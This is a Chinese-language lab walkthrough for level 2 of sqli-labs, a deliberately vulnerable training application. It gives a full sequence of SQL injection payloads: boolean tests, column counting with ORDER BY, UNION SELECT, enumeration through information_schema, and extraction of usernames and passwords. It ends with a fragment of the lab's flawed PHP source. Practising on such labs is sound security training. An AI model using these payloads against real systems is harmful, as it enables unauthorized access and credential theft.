sqli-labs-master第二关：Error Based- Intiger（sqli-labs教程）

sqli-labs-master第二关：Error Based- Intiger（sqli-labs教程）

接上篇博客：1 = 1 返回正常

and 1 = 1 %23

and 1 = 2 返回失败

and 1 = 2 %23

说明存在注入点：

order by  n 查看字段

当n=3时返回正确

order by 3  %23

当=4时返回错误

order by 4  %23

说明字段是3

用union select 进行联合查询：

并用报错的方式显示显示位：

union select 1,2,3  %23

通过上图可以看到显示位在2，3上。

用version（）和database（）查看php版本和当前网站用的数据库名字

我们通过上图可以看到数据库是“security” 版本是5.5.53

接下来我们查看数据库security下的表：

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23

通过上图可以看到有users表

查看users表里的列

 union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23

接下来就是查看username和password里的内容：

 union select 1,username,password from users where id = 2 %23

结束：

接下来看看源代码：

Welcome    Dhakkan 
"; if($row) {    echo "";    echo 'Your Login name:'. $row['username'];    echo "
";    echo 'Your Password:' .$row['password'];    echo "";    } else  { echo ''; print_r(mysql_error()); echo "";   } } else {  echo "Please input the ID as parameter with numeric value"; } ?>